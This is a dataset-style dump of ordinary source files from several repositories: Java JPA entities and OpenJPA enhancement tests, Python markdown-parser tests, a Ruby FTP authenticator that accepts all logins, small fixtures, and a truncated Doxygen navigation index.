| repo_name (stringlengths 6–101) | path (stringlengths 4–300) | text (stringlengths 7–1.31M) |
|---|---|---|
Pandrex247/patched-src-eclipselink
|
utils/org.eclipse.persistence.dbws.builder/src/org/eclipse/persistence/tools/dbws/PLSQLProcedureOperationModel.java
|
<filename>utils/org.eclipse.persistence.dbws.builder/src/org/eclipse/persistence/tools/dbws/PLSQLProcedureOperationModel.java
package org.eclipse.persistence.tools.dbws;
/**
 * Marker subclass of {@link ProcedureOperationModel} for PL/SQL stored
 * procedures: it overrides {@code isPLSQLProcedureOperation()} to report
 * {@code true} so callers can distinguish PL/SQL operations from plain ones.
 */
public class PLSQLProcedureOperationModel extends ProcedureOperationModel {

    /** @return always {@code true}; this model describes a PL/SQL procedure. */
    @Override
    public boolean isPLSQLProcedureOperation() {
        return true;
    }
}
|
wbars/go-lang-idea-plugin
|
testData/psi/resolve/vars/SimpleMethodParameter.go
|
package main
func method(/*def*/x int) {
/*ref*/x
}
|
a-pompom/Python-markdownParser
|
tests/converter/converter_grouping_test.py
|
<gh_stars>0
import pytest
from app.converter.converter import group_same_range_blocks
from app.markdown.parser import MarkdownParser
class TestGrouping:
    """Verify that block elements spanning the same range are grouped together."""

    # Lines inside a code-block range should be grouped under a CodeBlock element.
    @pytest.mark.parametrize(
        ('lines', 'expected_list'),
        [
            (
                ['```JavaScript', 'const i = 0;', '```', 'plain text'],
                ['[CodeBlock: language=JavaScript | Child of CodeBlock -> Plain: text=]',
                 '[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=const i = 0;]',
                 '[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=plain text]']
            ),
            (
                ['# heading', '```', 'sort();', '```'],
                ['[Heading: size=1 | Child of Heading -> Plain: text=heading]',
                 '[CodeBlock: language= | Child of CodeBlock -> Plain: text=]',
                 '[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=sort();]']
            ),
            (
                ['本文', '```python', 'for (int i=0; i < 10; i++)', '```'],
                ['[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=本文]',
                 '[CodeBlock: language=python | Child of CodeBlock -> Plain: text=]',
                 '[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=for (int i=0; i < 10; i++)]']
            ),
            (
                ['コードの例を示します。', '```', '> 入れ忘れました'],
                ['[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=コードの例を示します。]',
                 '[CodeBlock: language= | Child of CodeBlock -> Plain: text=]',
                 '[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=> 入れ忘れました]']
            ),
        ],
        ids=['head', 'between', 'tail', 'no end']
    )
    def test_code_block(self, lines: list[str], expected_list: list[str]):
        # GIVEN
        sut = group_same_range_blocks
        blocks = MarkdownParser().parse(lines).content
        # WHEN
        actual_blocks = sut(blocks)
        # THEN
        # Guard against silent truncation: zip() alone would let a missing or
        # extra block pass unnoticed because it stops at the shorter iterable.
        assert len(actual_blocks) == len(expected_list)
        for actual, expected in zip(actual_blocks, expected_list):
            assert repr(actual) == expected

    # Elements outside any grouping range should pass through unchanged.
    @pytest.mark.parametrize(
        ('lines', 'expected_list'),
        [
            (
                ['plain text', '# heading'],
                ['[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=plain text]',
                 '[Heading: size=1 | Child of Heading -> Plain: text=heading]']
            )
        ]
    )
    def test_not_grouping(self, lines: list[str], expected_list: list[str]):
        # GIVEN
        sut = group_same_range_blocks
        blocks = MarkdownParser().parse(lines).content
        # WHEN
        actual_blocks = sut(blocks)
        # THEN
        # Same truncation guard as test_code_block.
        assert len(actual_blocks) == len(expected_list)
        for actual, expected in zip(actual_blocks, expected_list):
            assert repr(actual) == expected
|
investtools/ftpmvc
|
lib/ftpmvc/authenticator/promiscuous.rb
|
module FTPMVC
  module Authenticator
    # Authenticator that accepts every username/password combination.
    # NOTE(review): grants access unconditionally — presumably meant for
    # development or testing only; confirm it is never wired into production.
    class Promiscuous
      # Always returns true, ignoring both arguments.
      def authenticate(username, password)
        true
      end
    end
  end
end
|
codeperfector/joss
|
src/main/java/org/javaswift/joss/exception/CommandExceptionError.java
|
package org.javaswift.joss.exception;
/**
 * Error categories used to classify {@code CommandException} failures.
 * NOTE(review): do not reorder constants — callers may rely on ordinal or
 * serialized names.
 */
public enum CommandExceptionError {
    UNKNOWN,
    ACCESS_FORBIDDEN,
    ENTITY_ALREADY_EXISTS,
    ENTITY_DOES_NOT_EXIST,
    CONTAINER_NOT_EMPTY,
    CONTENT_NOT_MODIFIED,
    CONTENT_DIFFERENT,
    MD5_CHECKSUM,
    MISSING_CONTENT_LENGTH_OR_TYPE,
    NO_SERVICE_CATALOG_FOUND,
    NO_TENANT_SUPPLIED,
    NO_END_POINT_FOUND,
    UNAUTHORIZED
}
|
piekaa/lol-stats
|
src/main/java/pl/noip/lolstats/lol/stats/dto/stats/MatchesResponse.java
|
package pl.noip.lolstats.lol.stats.dto.stats;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import java.util.List;
/**
 * Response DTO carrying a list of {@link Match} objects.
 * Getter and both constructors are generated by Lombok
 * ({@code @Getter}, {@code @NoArgsConstructor}, {@code @AllArgsConstructor}).
 */
@Getter
@NoArgsConstructor
@AllArgsConstructor
public class MatchesResponse {
    /** The matches contained in this response. */
    private List<Match> matches;
}
|
desmondbera/dental-schedule-app
|
dentalScheduleApp/src/com/dentalScheduleApp/entities/DentalOffice.java
|
package com.dentalScheduleApp.entities;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.Id;
import javax.persistence.NamedQueries;
import javax.persistence.NamedQuery;
import javax.persistence.OneToOne;
import javax.persistence.Table;
/**
 * JPA entity for a dental office: name, phone number, address and the user
 * whose primary office this is.
 */
@Entity
@Table(name="dental_office")
@NamedQueries({
    @NamedQuery(name="getAllDentalOffices", query="SELECT d FROM DentalOffice d")
})
public class DentalOffice {

    /** Surrogate primary key, generated by the persistence provider. */
    @Id
    @GeneratedValue
    @Column(name="id")
    private Long id;

    /** Display name of the office. */
    @Column(name="office_name")
    private String officeName;

    /** Contact phone number, stored as free-form text. */
    @Column(name="office_phone_number")
    private String officePhoneNumber;

    /** Postal address, stored as free-form text. */
    @Column(name="office_address")
    private String officeAddress;

    /** Owning side is User.primaryDentalOffice; all operations cascade. */
    @OneToOne(mappedBy = "primaryDentalOffice", cascade = CascadeType.ALL)
    private User user;

    // TODO(review): one-to-many relations to hygienists, users and appointments
    // were previously sketched here as commented-out fields; implement them as
    // real mappings when needed instead of keeping dead code.

    /** No-arg constructor required by JPA. */
    public DentalOffice() {
    }

    /**
     * Convenience constructor initializing every persistent field.
     *
     * @param id                primary key (may be null for new instances)
     * @param officeName        display name of the office
     * @param officePhoneNumber contact phone number
     * @param officeAddress     postal address
     * @param user              user whose primary office this is
     */
    public DentalOffice(Long id, String officeName, String officePhoneNumber, String officeAddress, User user) {
        this.id = id;
        this.officeName = officeName;
        this.officePhoneNumber = officePhoneNumber;
        this.officeAddress = officeAddress;
        this.user = user;
    }

    /** Returns the office display name. */
    public String getOfficeName() {
        return officeName;
    }

    /** Sets the office display name. */
    public void setOfficeName(String officeName) {
        this.officeName = officeName;
    }

    /** Returns the contact phone number. */
    public String getOfficePhoneNumber() {
        return officePhoneNumber;
    }

    /** Sets the contact phone number. */
    public void setOfficePhoneNumber(String officePhoneNumber) {
        this.officePhoneNumber = officePhoneNumber;
    }

    /** Returns the postal address. */
    public String getOfficeAddress() {
        return officeAddress;
    }

    /** Sets the postal address. */
    public void setOfficeAddress(String officeAddress) {
        this.officeAddress = officeAddress;
    }

    /** Returns the primary key. */
    public Long getId() {
        return id;
    }

    /** Sets the primary key. */
    public void setId(Long id) {
        this.id = id;
    }

    /** Returns the associated user. */
    public User getUser() {
        return user;
    }

    /** Sets the associated user. */
    public void setUser(User user) {
        this.user = user;
    }
}
|
solomax/openjpa
|
openjpa-persistence-jdbc/src/test/java/org/apache/openjpa/persistence/enhance/TestSubclassedBehavior.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.openjpa.persistence.enhance;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.persistence.EntityManager;
import javax.persistence.EntityManagerFactory;
import org.apache.openjpa.persistence.enhance.common.apps.
BackingFieldNameMismatchInstance;
import org.apache.openjpa.persistence.enhance.common.apps.BaseEntity;
import org.apache.openjpa.persistence.enhance.common.apps.BasicSubclassInstance;
import org.apache.openjpa.persistence.enhance.common.apps.DerivedEntity;
import org.apache.openjpa.persistence.enhance.common.apps.Entity1;
import org.apache.openjpa.persistence.enhance.common.apps.
ManagedInverseTestInstance;
import org.apache.openjpa.persistence.enhance.common.apps.
ManagedInverseTestInstance2;
import org.apache.openjpa.persistence.enhance.common.apps.SubclassTestInstance;
import org.apache.openjpa.persistence.common.utils.AbstractTestCase;
import junit.framework.AssertionFailedError;
import org.apache.openjpa.kernel.Broker;
import org.apache.openjpa.kernel.OpenJPAStateManager;
import org.apache.openjpa.meta.AccessCode;
import org.apache.openjpa.meta.ClassMetaData;
import org.apache.openjpa.meta.FieldMetaData;
import org.apache.openjpa.persistence.JPAFacadeHelper;
import org.apache.openjpa.persistence.OpenJPAEntityManager;
import org.apache.openjpa.persistence.OpenJPAQuery;
import org.apache.openjpa.util.ExceptionInfo;
import org.apache.openjpa.util.ImplHelper;
/**
 * Tests behavior of runtime-enhanced subclasses: persistence lifecycle
 * operations, inheritance metadata, polymorphic queries, non-transactional
 * write restrictions, version increments, inverse management and backing-field
 * metadata resolution across two factories.
 */
public class TestSubclassedBehavior extends AbstractTestCase {

    public TestSubclassedBehavior(String name) {
        super(name, "enhancecactusapp");
    }

    // Clear out every entity type these tests persist.
    public void setUp() {
        deleteAll(BasicSubclassInstance.class);
        deleteAll(BackingFieldNameMismatchInstance.class);
        deleteAll(BaseEntity.class);
        deleteAll(ManagedInverseTestInstance.class);
        deleteAll(ManagedInverseTestInstance2.class);
    }

    // Persists a DerivedEntity with a one-to-one, checks PC-superclass
    // metadata, and verifies lazy loading of the relation on reload.
    public void testInheritance() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        DerivedEntity de = (DerivedEntity) newInstance(pm, DerivedEntity.class);
        BasicSubclassInstance basic = (BasicSubclassInstance) newInstance(pm,
            BasicSubclassInstance.class);
        basic.setStringField("basic one-to-one");
        de.setOneToOne(basic);
        Object oid = persistenceOperations(pm, de, false);
        // ##### need a test case for JDOHelper.createEntityManager() for
        // subclass
        ClassMetaData meta = JPAFacadeHelper.getMetaData(pm, de.getClass());
        assertEquals(BaseEntity.class, meta.getPCSuperclass());
        pm = (OpenJPAEntityManager) currentEntityManager();
        Object o = pm.find(DerivedEntity.class, oid);
        assertTrue(o instanceof DerivedEntity);
        de = (DerivedEntity) o;
        Broker b = JPAFacadeHelper.toBroker(pm);
        OpenJPAStateManager sm = b.getStateManager(de);
        // we use getLoaded() here because isLoaded() always returns true.
        assertFalse(sm.getLoaded().get(
            sm.getMetaData().getField("oneToOne").getIndex()));
        assertEquals("basic one-to-one", de.getOneToOne().getStringField());
        assertTrue(sm.getLoaded().get(sm.getMetaData()
            .getField("oneToOne").getIndex()));
        startTx(pm);
        pm.remove(de);
        endTx(pm);
        endEm(pm);
    }

    // Runs the full persist/modify/delete cycle on a basic subclass instance.
    public void testBasicSubclassPersistenceOperations()
        throws ClassNotFoundException {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BasicSubclassInstance o = (BasicSubclassInstance) newInstance(pm,
            BasicSubclassInstance.class);
        persistenceOperations(pm, o, true);
    }

    // Same cycle for an entity whose backing field name differs from the
    // property name.
    public void testBackingFieldNameMismatch() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BackingFieldNameMismatchInstance o = (BackingFieldNameMismatchInstance)
            newInstance(pm, BackingFieldNameMismatchInstance.class);
        persistenceOperations(pm, o, true);
    }

    // Helper: create a managed instance through the OpenJPA EM.
    private Object newInstance(OpenJPAEntityManager pm, Class cls) {
        return pm.createInstance(cls);
    }

    // Helper: same, but starting from a plain JPA EntityManager.
    private Object createInstance(EntityManager em, Class cls) {
        return ((OpenJPAEntityManager) em).createInstance(cls);
    }

    /**
     * Persists {@code o}, re-finds and modifies it in a new EM, then either
     * deletes it (returning null) or returns its object id when
     * {@code delete} is false.
     */
    private Object persistenceOperations(OpenJPAEntityManager pm,
        SubclassTestInstance o, boolean delete) {
        startTx(pm);
        pm.persist(o);
        o.setStringField("new persistent instance");
        endTx(pm);
        Object oid = pm.getObjectId(o);
        endEm(pm);
        pm = (OpenJPAEntityManager) currentEntityManager();
        o = (SubclassTestInstance) pm.find(SubclassTestInstance.class, oid);
        assertEquals("new persistent instance", o.getStringField());
        startTx(pm);
        o.setStringField("modified persistent instance");
        endTx(pm);
        endEm(pm);
        if (delete) {
            pm = (OpenJPAEntityManager) currentEntityManager();
            o = (SubclassTestInstance) pm.find(SubclassTestInstance.class, oid);
            assertEquals("modified persistent instance", o.getStringField());
            startTx(pm);
            pm.remove(o);
            endTx(pm);
            endEm(pm);
            return null;
        } else {
            return oid;
        }
    }

    // Queries BaseEntity and expects both base and derived instances back,
    // ordered by shortField.
    public void testPolymorphicQueries() {
        deleteAll(BaseEntity.class);
        deleteAll(BasicSubclassInstance.class);
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        startTx(pm);
        BaseEntity be = (BaseEntity) newInstance(pm, BaseEntity.class);
        be.setShortField((short) 0);
        pm.persist(be);
        be = (BaseEntity) newInstance(pm, BaseEntity.class);
        be.setShortField((short) 1);
        pm.persist(be);
        DerivedEntity de = (DerivedEntity) newInstance(pm, DerivedEntity.class);
        de.setShortField((short) 2);
        de.setOneToOne((BasicSubclassInstance) newInstance(pm,
            BasicSubclassInstance.class));
        pm.persist(de);
        de = (DerivedEntity) newInstance(pm, DerivedEntity.class);
        de.setShortField((short) 3);
        de.setOneToOne((BasicSubclassInstance) newInstance(pm,
            BasicSubclassInstance.class));
        pm.persist(de);
        endTx(pm);
        endEm(pm);
        pm = (OpenJPAEntityManager) currentEntityManager();
        OpenJPAQuery q =
            pm.createQuery("SELECT a FROM BaseEntity a "
                + "ORDER BY a.shortField ASC");
        List l = (List) q.getResultList();
        assertEquals(4, l.size());
        assertEquals(0, ((BaseEntity) l.get(0)).getShortField());
        assertEquals(1, ((BaseEntity) l.get(1)).getShortField());
        assertEquals(2, ((BaseEntity) l.get(2)).getShortField());
        assertEquals(3, ((BaseEntity) l.get(3)).getShortField());
        assertTrue(l.get(2) instanceof DerivedEntity);
        assertTrue(l.get(3) instanceof DerivedEntity);
        endEm(pm);
    }

    // Writing outside a transaction without NTW must fail (enhanced class).
    public void testEnhancedClassChangesOutsideTxWithoutNTW() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        startTx(pm);
        deleteAll(Entity1.class);
        endTx(pm);
        Entity1 o = new Entity1(8, "pk 8", 4);
        startTx(pm);
        pm.persist(o);
        endTx(pm);
        Object oid = pm.getObjectId(o);
        endEm(pm);
        pm = (OpenJPAEntityManager) currentEntityManager();
        o = (Entity1) pm.find(Entity1.class, oid);
        try {
            o.setStringField("hello");
            fail("non-transactional write should not be allowed");
        } catch (Exception e) {
            // expected
        } finally {
            endEm(pm);
        }
    }

    // Same restriction for a runtime-enhanced subclass instance.
    public void testSubclassChangesOutsideTxWithoutNTW() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BasicSubclassInstance basic = (BasicSubclassInstance) newInstance(pm,
            BasicSubclassInstance.class);
        basic.setStringField("foo");
        startTx(pm);
        pm.persist(basic);
        endTx(pm);
        Object oid = pm.getObjectId(basic);
        endEm(pm);
        pm = (OpenJPAEntityManager) currentEntityManager();
        basic =
            (BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
        try {
            basic.setStringField("hello");
            fail("non-transactional write should not be allowed");
        } catch (Exception e) {
            // expected
        } finally {
            endEm(pm);
        }
    }

    // Exercises state-manager bookkeeping: new/persistent/dirty flags,
    // eviction, lazy re-load, and deletion.
    public void testBasicPMUses() {
        // retain so we don't reload in the reads after the tx commit
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        Broker broker = JPAFacadeHelper.toBroker(pm);
        startTx(pm);
        // register a new instance with the PM
        BasicSubclassInstance basic = (BasicSubclassInstance) newInstance
            (pm, BasicSubclassInstance.class);
        assertTrue(ImplHelper.isManageable(basic));
        basic.setStringField("foo");
        pm.persist(basic);
        assertTrue(broker.isNew(basic));
        assertTrue(broker.isPersistent(basic));
        // commit. this should cause the data to be written.
        // ### should check SQL count
        endTx(pm);
        assertFalse(broker.isNew(basic));
        OpenJPAStateManager sm = broker.getStateManager(basic);
        assertNotNull(sm);
        assertEquals(sm.getManagedInstance(), basic);
        FieldMetaData fmd = sm.getMetaData().getField("stringField");
        assertEquals("foo", sm.fetch(fmd.getIndex()));
        assertTrue(sm.getLoaded().get(fmd.getIndex()));
        pm.evict(basic);
        assertFalse(sm.getLoaded().get(fmd.getIndex()));
        // lazy loading
        assertNotNull(basic.getStringField());
        assertEquals("foo", sm.fetch(fmd.getIndex()));
        assertEquals("foo", basic.getStringField());
        assertTrue(sm.getLoaded().get(fmd.getIndex()));
        startTx(pm);
        basic.setStringField("bar");
        assertTrue(broker.isDirty(basic));
        endTx(pm);
        Object oid = broker.getObjectId(basic);
        assertNotNull(oid);
        endEm(pm);
        pm = (OpenJPAEntityManager) currentEntityManager();
        basic =
            (BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
        assertEquals("bar", basic.getStringField());
        startTx(pm);
        pm.remove(basic);
        assertTrue(JPAFacadeHelper.toBroker(pm).isDeleted(basic));
        endTx(pm);
        endEm(pm);
    }

    // Object id must exist until the removing transaction commits, then
    // disappear; finding the deleted instance in a new EM must fail.
    public void testGetObjectId() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BasicSubclassInstance basic = new BasicSubclassInstance();
        basic.setStringField("foo");
        startTx(pm);
        pm.persist(basic);
        endTx(pm);
        Object oid = null;
        try {
            assertNotNull(oid = pm.getObjectId(basic));
        } catch (Exception e) {
            fail("object id lookup failed: " + e.getMessage());
        }
        startTx(pm);
        pm.remove(basic);
        // before committing, id should exist still
        assertNotNull(pm.getObjectId(basic));
        endTx(pm);
        assertNull(pm.getObjectId(basic));
        endEm(pm);
        // looking up the instance by id in a new PM should fail.
        pm = (OpenJPAEntityManager) currentEntityManager();
        try {
            pm.find(BasicSubclassInstance.class, oid);
            fail("instance should have been deleted!");
        } catch (Exception e) {
            // expected
        }
        endEm(pm);
    }

    // With non-transactional write enabled, an outside-tx change should be
    // flushed by the next transaction (known bug 1205 tolerated).
    public void testChangesOutsideTxWithNTW() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BasicSubclassInstance basic = new BasicSubclassInstance();
        basic.setStringField("foo");
        startTx(pm);
        pm.persist(basic);
        endTx(pm);
        Object oid = pm.getObjectId(basic);
        endEm(pm);
        pm = getNTWPM();
        basic =
            (BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
        basic.setStringField("hello");
        startTx(pm);
        endTx(pm);
        endEm(pm);
        pm = (OpenJPAEntityManager) currentEntityManager();
        basic =
            (BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
        try {
            assertEquals("hello", basic.getStringField());
        } catch (AssertionFailedError afe) {
            bug(1205, afe, "JDO 2-style NTW not supported.");
        }
    }

    // Without NTW the write must throw, and the failed object must be
    // reported in the exception info.
    public void testChangesOutsideTxWithoutNTW() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BasicSubclassInstance basic = new BasicSubclassInstance();
        basic.setStringField("foo");
        startTx(pm);
        pm.persist(basic);
        endTx(pm);
        try {
            basic.setStringField("hello");
            fail("should not be able to write outside tx without NTW");
        } catch (RuntimeException re) {
            // expected case
            Object failed = ((ExceptionInfo) re).getFailedObject();
            assertNotNull(failed);
            assertSame(basic, failed);
        } finally {
            endEm(pm);
        }
    }

    // Helper: an EM with non-transactional write enabled.
    private OpenJPAEntityManager getNTWPM() {
        EntityManagerFactory pmf = getEmf();
        OpenJPAEntityManager em =
            (OpenJPAEntityManager) pmf.createEntityManager();
        em.setNontransactionalWrite(true);
        return em;
    }

    /*
    public void testCallbacks ()
    {
        fail ("##### unimplemented test");
    }
    public void testTransactionListeners ()
    {
        fail ("#####");
    }
    public void testRemoteCommitListeners ()
    {
        fail ("#####");
    }
    public void testCaching ()
    {
        fail ("#####");
    }
    public void testRemote ()
    {
        fail ("#####");
    }
    */

    public void testVersionIncrementAndIdField() {
        // make sure that version increments happen correctly, and are
        // visible in the user-visible instance.
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        BasicSubclassInstance basic = new BasicSubclassInstance();
        basic.setStringField("foo");
        startTx(pm);
        pm.persist(basic);
        endTx(pm);
        assertEquals(1, basic.getVersion());
        long id = basic.getId();
        assertNotEquals(0, id);
        startTx(pm);
        basic.setStringField("bar");
        endTx(pm);
        assertEquals(2, basic.getVersion());
        endEm(pm);
    }

    /*
    public void testAutoAssignedFields ()
    {
        // make sure that auto-assigned field values get into the user-visible
        // instance.
        fail ("#####");
    }
    */

    // Smoke test through the plain JPA EntityManager interface.
    public void testJPABasics() {
        EntityManager em = currentEntityManager();
        BasicSubclassInstance basic = (BasicSubclassInstance) createInstance(
            em, BasicSubclassInstance.class);
        basic.setStringField("hello");
        startTx(em);
        em.persist(basic);
        endTx(em);
        endEm(em);
    }

    /*
    public void testDetachmentAndAttachemnt ()
    {
        fail ("#####");
    }
    public void testEmbeddedNonEnhanced ()
    {
        fail ("#####");
    }
    public void testTransactionalNonEnhanced ()
    {
        fail ("#####");
    }
    public void testBulkTransactionalNonEnhanced ()
    {
        fail ("#####");
    }
    */

    // With openjpa.InverseManager enabled, setting one side of the relation
    // should populate the inverse automatically after commit.
    public void testSingleValuedInverseManagement() {
        Map map = new HashMap();
        map.put("openjpa.InverseManager", "true");
        OpenJPAEntityManager pm = (OpenJPAEntityManager)
            getEmf(map).createEntityManager();
        ManagedInverseTestInstance managed = (ManagedInverseTestInstance)
            newInstance(pm, ManagedInverseTestInstance.class);
        ManagedInverseTestInstance2 managed2 = (ManagedInverseTestInstance2)
            newInstance(pm, ManagedInverseTestInstance2.class);
        managed.setStringField("managed");
        managed2.setStringField("managed2");
        managed.setManaged2(managed2);
        startTx(pm);
        pm.persist(managed);
        endTx(pm);
        assertSame(managed, managed2.getManaged());
    }

    // Metadata loaded from the PCRegistry (second factory) must match the
    // reflection-derived defaults: property access, method-backed fields,
    // and fields defined at the correct level of the hierarchy.
    public void testBackingFieldConfigurationWithTwoFactories() {
        OpenJPAEntityManager pm =
            (OpenJPAEntityManager) currentEntityManager();
        // this causes DerivedEntity.class to get loaded into PCRegistry
        newInstance(pm, DerivedEntity.class);
        Map map = new HashMap();
        map.put("openjpa.Log", "DiagnosticContext=subclass-two-factories-test");
        pm = (OpenJPAEntityManager) getEmf(map).createEntityManager();
        newInstance(pm, DerivedEntity.class);
        // this second new-instance creation will result in the metadata
        // defaults being loaded from the PCRegistry instead of via reflection.
        // Make sure that things still work as expected from the
        // registry-parsing code.
        ClassMetaData meta = getConfiguration()
            .getMetaDataRepositoryInstance().
            getMetaData(DerivedEntity.class, null, false);
        assertTrue("meta's access should be ACCESS_PROPERTY",
            AccessCode.isProperty(meta.getAccessType()));
        FieldMetaData[] fmds = meta.getFields();
        for (int i = 0; i < fmds.length; i++) {
            assertEquals(Method.class, fmds[i].getBackingMember().getClass());
            // make sure that the fields are defined in the right part of the
            // hierarchy
            if (fmds[i].getName().equals("intField") ||
                fmds[i].getName().equals("oneToOne")) {
                assertEquals(DerivedEntity.class,
                    fmds[i].getDefiningMetaData().getDescribedType());
            } else {
                assertEquals(BaseEntity.class,
                    fmds[i].getDefiningMetaData().getDescribedType());
            }
        }
    }
}
|
matias-capeletto/plugins
|
packages/node-resolve/test/fixtures/hash-in-path.js
|
// Fixture: verifies the resolver handles a module path containing '#'.
// The import specifier string must stay exactly 'test/#/foo'.
import test from 'test/#/foo';
export default test;
|
purusharths/NumCpp
|
docs/doxygen/html/navtreeindex6.js
|
var NAVTREEINDEX6 =
{
"corrcoef_8hpp.html":[6,0,101],
"corrcoef_8hpp.html#a2232014b014afca61e5ebe93c5ba2c0c":[6,0,101,0],
"corrcoef_8hpp_source.html":[6,0,101],
"cos_8hpp.html":[6,0,102],
"cos_8hpp.html#a736de91eb8f79bfaf4dc92d7161f1c87":[6,0,102,1],
"cos_8hpp.html#af208ae28fe0df17392ca128188cbcd73":[6,0,102,0],
"cos_8hpp_source.html":[6,0,102],
"cosh_8hpp.html":[6,0,103],
"cosh_8hpp.html#a520e0290bb667b43a9f494b3858b5f17":[6,0,103,0],
"cosh_8hpp.html#abb07133a1f54b24a4a4986eefb5eda85":[6,0,103,1],
"cosh_8hpp_source.html":[6,0,103],
"count__nonzero_8hpp.html":[6,0,104],
"count__nonzero_8hpp.html#aebb0dfe3637c07f6a9f6e4f08cacf515":[6,0,104,0],
"count__nonzero_8hpp_source.html":[6,0,104],
"cov_8hpp.html":[6,0,105],
"cov_8hpp.html#a61dbb6e2f778525a305dc235a9a43c76":[6,0,105,0],
"cov_8hpp_source.html":[6,0,105],
"cov__inv_8hpp.html":[6,0,106],
"cov__inv_8hpp.html#a2a45ff9db0b44932844a5d9cb13b2d38":[6,0,106,0],
"cov__inv_8hpp_source.html":[6,0,106],
"cross_8hpp.html":[6,0,107],
"cross_8hpp.html#a4d1ed581965ed53090824290def38565":[6,0,107,0],
"cross_8hpp_source.html":[6,0,107],
"cumprod_8hpp.html":[6,0,110],
"cumprod_8hpp.html#aafc4846f2f7956841d356060c9689cba":[6,0,110,0],
"cumprod_8hpp_source.html":[6,0,110],
"cumsum_8hpp.html":[6,0,111],
"cumsum_8hpp.html#a2abc8c4a18823234e3baec64d10c0dcd":[6,0,111,0],
"cumsum_8hpp_source.html":[6,0,111],
"cyclic__hankel__1_8hpp.html":[6,0,112],
"cyclic__hankel__1_8hpp.html#ae7053cd6eafb59a62ba6ede63aac6f90":[6,0,112,0],
"cyclic__hankel__1_8hpp.html#af5dd42de33ec77dda47dd089561895d5":[6,0,112,1],
"cyclic__hankel__1_8hpp_source.html":[6,0,112],
"cyclic__hankel__2_8hpp.html":[6,0,113],
"cyclic__hankel__2_8hpp.html#a388472a49e89f21b3eb144368fe55664":[6,0,113,1],
"cyclic__hankel__2_8hpp.html#a8e3b27238d1cae20e4ee071766549c5d":[6,0,113,0],
"cyclic__hankel__2_8hpp_source.html":[6,0,113],
"deg2rad_8hpp.html":[6,0,117],
"deg2rad_8hpp.html#a2cdc1c791ab98eb708ba5662ffb82b39":[6,0,117,1],
"deg2rad_8hpp.html#a828388cb973b4e28e0b7060694e2604a":[6,0,117,0],
"deg2rad_8hpp_source.html":[6,0,117],
"degree_seperation_8hpp.html":[6,0,119],
"degree_seperation_8hpp.html#a06135e21507cfe2aa1cb4154fe1702bf":[6,0,119,0],
"degree_seperation_8hpp.html#abc47b2d64d107bcb19ff696ecff89edf":[6,0,119,1],
"degree_seperation_8hpp_source.html":[6,0,119],
"degrees_8hpp.html":[6,0,118],
"degrees_8hpp.html#a75c2b6b4713a5695a4738da25cf9d262":[6,0,118,1],
"degrees_8hpp.html#aab0d24a5ffaf73330854bbcfc47d2fee":[6,0,118,0],
"degrees_8hpp_source.html":[6,0,118],
"delete_indices_8hpp.html":[6,0,121],
"delete_indices_8hpp.html#a53ddac04b49358cb41736640871bcea2":[6,0,121,2],
"delete_indices_8hpp.html#a7c33539e037218ba9b0b11acfae38363":[6,0,121,1],
"delete_indices_8hpp.html#ae59479b36cd7991d9dfc2d836b4d838c":[6,0,121,0],
"delete_indices_8hpp_source.html":[6,0,121],
"det_8hpp.html":[6,0,122],
"det_8hpp.html#a55bafcebbc897458164e8dc511b6119c":[6,0,122,0],
"det_8hpp_source.html":[6,0,122],
"diag_8hpp.html":[6,0,123],
"diag_8hpp.html#a8c80cee3e4853bc79290c995cf9d69dc":[6,0,123,0],
"diag_8hpp_source.html":[6,0,123],
"diagflat_8hpp.html":[6,0,124],
"diagflat_8hpp.html#af3ab63d17fa40b3c3880a9065a95e47f":[6,0,124,0],
"diagflat_8hpp_source.html":[6,0,124],
"diagonal_8hpp.html":[6,0,125],
"diagonal_8hpp.html#a8eeb67e5ad2a5b0567570a774b7fb1f3":[6,0,125,0],
"diagonal_8hpp_source.html":[6,0,125],
"diff_8hpp.html":[6,0,126],
"diff_8hpp.html#a94701ce8e9c8a4bb6dd162da5d07eadd":[6,0,126,0],
"diff_8hpp_source.html":[6,0,126],
"digamma_8hpp.html":[6,0,127],
"digamma_8hpp.html#a6419633142287d898c551f99cd7c589d":[6,0,127,0],
"digamma_8hpp.html#a78dead2375df379d1976ff87f62fbade":[6,0,127,1],
"digamma_8hpp_source.html":[6,0,127],
"discrete_8hpp.html":[6,0,128],
